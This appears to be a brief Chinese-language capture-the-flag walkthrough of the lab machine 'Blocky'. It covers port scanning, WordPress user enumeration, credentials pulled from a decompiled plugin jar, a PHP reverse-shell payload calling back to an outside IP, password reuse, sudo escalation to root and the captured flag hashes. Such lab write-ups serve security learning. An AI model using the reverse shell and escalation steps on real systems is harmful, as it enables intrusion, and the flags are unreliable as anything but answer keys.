信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.37 | TCP:21,22,80,25565 |
$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
HTTPD
# echo '10.10.10.37 blocky.htb'>>/etc/hosts
$ wpscan --url http://blocky.htb/ --enumerate u
username:notch
$ dirb http://blocky.htb
http://blocky.htb/plugins/
http://blocky.htb/phpmyadmin/
Jar包反编译
$ wget http://blocky.htb/plugins/files/BlockyCore.jar
$ binwalk BlockyCore.jar
$ foremost BlockyCore.jar
$ cd ./output/zip
$ unzip 00000000.zip
$ cd ./com/myfirstplugin
$ javap -c BlockyCore.class
username:root password:8YsqfCTnvxAUeduzjNSXe22
www-data 权限
phpAdmin登录,更新notch密码
https://www.useotools.com/ru/wordpress-password-hash-generator
$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/
$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
$ curl http://blocky.htb/
$ su notch
Password: 8YsqfCTnvxAUeduzjNSXe22
User.txt
23da8f7548a2c1df972caa7fc6ca3b9d
权限提升
$ sudo -l
$ sudo /bin/bash
Root.txt
8e66e7402571816ee90419d1a6eca642